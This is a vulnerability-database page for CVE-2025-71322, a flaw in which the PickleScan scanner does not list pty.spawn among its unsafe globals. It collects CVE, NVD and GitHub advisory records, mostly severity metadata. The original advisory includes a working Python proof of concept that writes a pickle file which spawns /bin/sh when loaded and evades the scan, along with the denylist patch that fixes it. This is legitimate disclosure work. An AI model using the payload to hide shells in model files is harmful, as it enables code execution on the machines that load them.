CVE-2025-71322 (GCVE-0-2025-71322)
Vulnerability from cvelistv5 – Published: 2026-06-17 15:04 – Updated: 2026-06-18 15:19
VLAI
Title
PickleScan - Unsafe Globals Check Bypass via pty.spawn Function
Summary
PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-693 - Protection Mechanism Failure
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/mmaitre314/picklescan/security… | vendor-advisory |
| https://www.vulncheck.com/advisories/picklescan-u… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| PickleScan | PickleScan |
Affected:
0 , < 0.0.33
(semver)
Unaffected: 0.0.33 (semver) |
Date Public
2025-12-26 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-71322",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-18T15:17:59.576526Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-18T15:19:25.962Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:pypi/picklescan",
"product": "PickleScan",
"vendor": "PickleScan",
"versions": [
{
"lessThan": "0.0.33",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "0.0.33",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*",
"versionEndExcluding": "0.0.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "yarienkiva"
}
],
"datePublic": "2025-12-26T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-693",
"description": "Protection Mechanism Failure",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T15:04:59.421Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "GHSA Advisory GHSA-hgrh-qx5j-jfwx",
"tags": [
"vendor-advisory"
],
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
},
{
"name": "VulnCheck Advisory: PickleScan - Unsafe Globals Check Bypass via pty.spawn Function",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/picklescan-unsafe-globals-check-bypass-via-pty-spawn-function"
}
],
"title": "PickleScan - Unsafe Globals Check Bypass via pty.spawn Function",
"x_generator": {
"engine": "vulncheck-endgame"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-71322",
"datePublished": "2026-06-17T15:04:59.421Z",
"dateReserved": "2026-06-08T20:44:31.209Z",
"dateUpdated": "2026-06-18T15:19:25.962Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-71322",
"date": "2026-06-18",
"epss": "0.00384",
"percentile": "0.30033"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-71322\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-18T15:17:59.576526Z\"}}}], \"references\": [{\"url\": \"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-18T15:18:59.563Z\"}}], \"cna\": {\"title\": \"PickleScan - Unsafe Globals Check Bypass via pty.spawn Function\", \"credits\": [{\"lang\": \"en\", \"type\": \"reporter\", \"value\": \"yarienkiva\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"PickleScan\", \"product\": \"PickleScan\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.0.33\", \"versionType\": \"semver\"}, {\"status\": \"unaffected\", \"version\": \"0.0.33\", \"versionType\": \"semver\"}], \"packageURL\": \"pkg:pypi/picklescan\", \"defaultStatus\": \"unaffected\"}], \"datePublic\": \"2025-12-26T00:00:00.000Z\", \"references\": [{\"url\": \"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx\", \"name\": \"GHSA Advisory GHSA-hgrh-qx5j-jfwx\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://www.vulncheck.com/advisories/picklescan-unsafe-globals-check-bypass-via-pty-spawn-function\", \"name\": \"VulnCheck Advisory: PickleScan - Unsafe Globals Check Bypass via pty.spawn Function\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"vulncheck-endgame\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-693\", \"description\": \"Protection Mechanism Failure\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"0.0.33\"}], \"operator\": \"OR\"}]}], \"providerMetadata\": {\"orgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"shortName\": \"VulnCheck\", \"dateUpdated\": \"2026-06-17T15:04:59.421Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-71322\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-18T15:19:25.962Z\", \"dateReserved\": \"2026-06-08T20:44:31.209Z\", \"assignerOrgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"datePublished\": \"2026-06-17T15:04:59.421Z\", \"assignerShortName\": \"VulnCheck\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-71322
Vulnerability from fkie_nvd - Published: 2026-06-17 17:16 - Updated: 2026-06-17 20:21
Severity
Summary
PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:pypi/picklescan",
"product": "PickleScan",
"vendor": "PickleScan",
"versions": [
{
"lessThan": "0.0.33",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "0.0.33",
"versionType": "semver"
}
]
}
],
"source": "disclosure@vulncheck.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan."
}
],
"id": "CVE-2025-71322",
"lastModified": "2026-06-17T20:21:59.863",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "disclosure@vulncheck.com",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "disclosure@vulncheck.com",
"type": "Secondary"
}
]
},
"published": "2026-06-17T17:16:40.980",
"references": [
{
"source": "disclosure@vulncheck.com",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
},
{
"source": "disclosure@vulncheck.com",
"url": "https://www.vulncheck.com/advisories/picklescan-unsafe-globals-check-bypass-via-pty-spawn-function"
}
],
"sourceIdentifier": "disclosure@vulncheck.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-693"
}
],
"source": "disclosure@vulncheck.com",
"type": "Primary"
}
]
}
GHSA-5GP7-4733-2W2V
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-18 14:41
VLAI
Summary
Duplicate Advisory: Picklescan Bypasses Unsafe Globals Check using pty.spawn
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hgrh-qx5j-jfwx. This link is maintained to preserve external references.
Original Description
PickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.
Severity
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 0.0.33"
},
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:41:20Z",
"nvd_published_at": "2026-06-17T17:16:40Z",
"severity": "HIGH"
},
"details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-hgrh-qx5j-jfwx. This link is maintained to preserve external references.\n\n## Original Description\n\nPickleScan before 0.0.33 fails to include the pty.spawn function in its unsafe globals list, allowing attackers to bypass security checks. Malicious actors can craft pickle payloads using pty.spawn to achieve arbitrary code execution when files are processed by PickleScan.",
"id": "GHSA-5gp7-4733-2w2v",
"modified": "2026-06-18T14:41:20Z",
"published": "2026-06-17T18:35:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71322"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/picklescan-unsafe-globals-check-bypass-via-pty-spawn-function"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: Picklescan Bypasses Unsafe Globals Check using pty.spawn",
"withdrawn": "2026-06-18T14:41:20Z"
}
GHSA-HGRH-QX5J-JFWX
Vulnerability from github – Published: 2025-12-29 15:26 – Updated: 2026-06-18 14:41
VLAI
Summary
Picklescan Bypasses Unsafe Globals Check using pty.spawn
Details
Summary
The vulnerability allows malicious actors to bypass PickleScan's unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan's list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.
Details
For 2025's HeroCTF, there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and Fickling to gain code execution. The challenge writeup, files and solve script have all been released.
The intended way was to use pty.spawn but some players found alternative solutions.
PoC
- Run the following Python code to generate the PoC pickle file.
import pickle
command = b"/bin/sh"
payload = b"".join(
[
pickle.PROTO + pickle.pack("B", 4),
pickle.MARK,
pickle.GLOBAL + b"pty\n" + b"spawn\n",
pickle.EMPTY_LIST,
pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,
pickle.APPEND,
# Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes
pickle.OBJ,
pickle.STOP,
]
)
with open("dump.pkl", "wb") as f:
f.write(payload)
- Run PickleScan on the generated pickle file.
PickleScan detects the pty.spawn global as "suspicious" but not "dangerous", allowing it to be loaded.
Impact
Severity: High
Affected Users: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.
Impact Details: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the pty.spawn function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.
Suggested Patch
diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715..b434069 100644
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -150,6 +150,7 @@ _unsafe_globals = {
"_pickle": "*",
"pip": "*",
"profile": {"Profile.run", "Profile.runctx"},
+ "pty": "spawn",
"pydoc": "pipepager", # pydoc.pipepager('help','echo pwned')
"timeit": "*",
"torch._dynamo.guards": {"GuardBuilder.get"},
Severity
8.8 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-71322"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-29T15:26:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe vulnerability allows malicious actors to bypass PickleScan\u0027s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of the `pty.spawn` function) from PickleScan\u0027s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.\n\n### Details\nFor 2025\u0027s [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players would need to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released.\n\nThe intended way was to use `pty.spawn` but some players found alternative solutions.\n\n### PoC\n\n- Run the following Python code to generate the PoC pickle file.\n\n```py\nimport pickle\n\ncommand = b\"/bin/sh\"\n\npayload = b\"\".join(\n [\n pickle.PROTO + pickle.pack(\"B\", 4),\n pickle.MARK,\n pickle.GLOBAL + b\"pty\\n\" + b\"spawn\\n\",\n pickle.EMPTY_LIST,\n pickle.SHORT_BINUNICODE + pickle.pack(\"B\", len(command)) + command,\n pickle.APPEND,\n # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes\n pickle.OBJ,\n pickle.STOP,\n ]\n)\n\nwith open(\"dump.pkl\", \"wb\") as f:\n f.write(payload)\n```\n\n- Run PickleScan on the generated pickle file.\n\u003cimg width=\"936\" height=\"311\" alt=\"picklescan_bypass_pty_spawn\" src=\"https://github.com/user-attachments/assets/0d6430e4-a7e5-461c-9d75-c607f6886c9f\" /\u003e\n\nPickleScan detects the `pty.spawn` global as \"suspicious\" but not \"dangerous\", allowing it to be loaded.\n\n### Impact\n**Severity**: High\n**Affected Users**: Any organization, like HuggingFace, or individual using PickleScan to analyze PyTorch models or other files distributed as ZIP archives for malicious pickle content.\n**Impact Details**: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the `pty.spawn` function. This could lead to arbitrary code execution on the user\u0027s system when these malicious files are processed or loaded.\n\n### Suggested Patch\n\n```\ndiff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py\nindex 34a5715..b434069 100644\n--- a/src/picklescan/scanner.py\n+++ b/src/picklescan/scanner.py\n@@ -150,6 +150,7 @@ _unsafe_globals = {\n \"_pickle\": \"*\",\n \"pip\": \"*\",\n \"profile\": {\"Profile.run\", \"Profile.runctx\"},\n+ \"pty\": \"spawn\",\n \"pydoc\": \"pipepager\", # pydoc.pipepager(\u0027help\u0027,\u0027echo pwned\u0027)\n \"timeit\": \"*\",\n \"torch._dynamo.guards\": {\"GuardBuilder.get\"},\n```",
"id": "GHSA-hgrh-qx5j-jfwx",
"modified": "2026-06-18T14:41:30Z",
"published": "2025-12-29T15:26:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71322"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/pull/53"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/picklescan-unsafe-globals-check-bypass-via-pty-spawn-function"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Picklescan Bypasses Unsafe Globals Check using pty.spawn"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…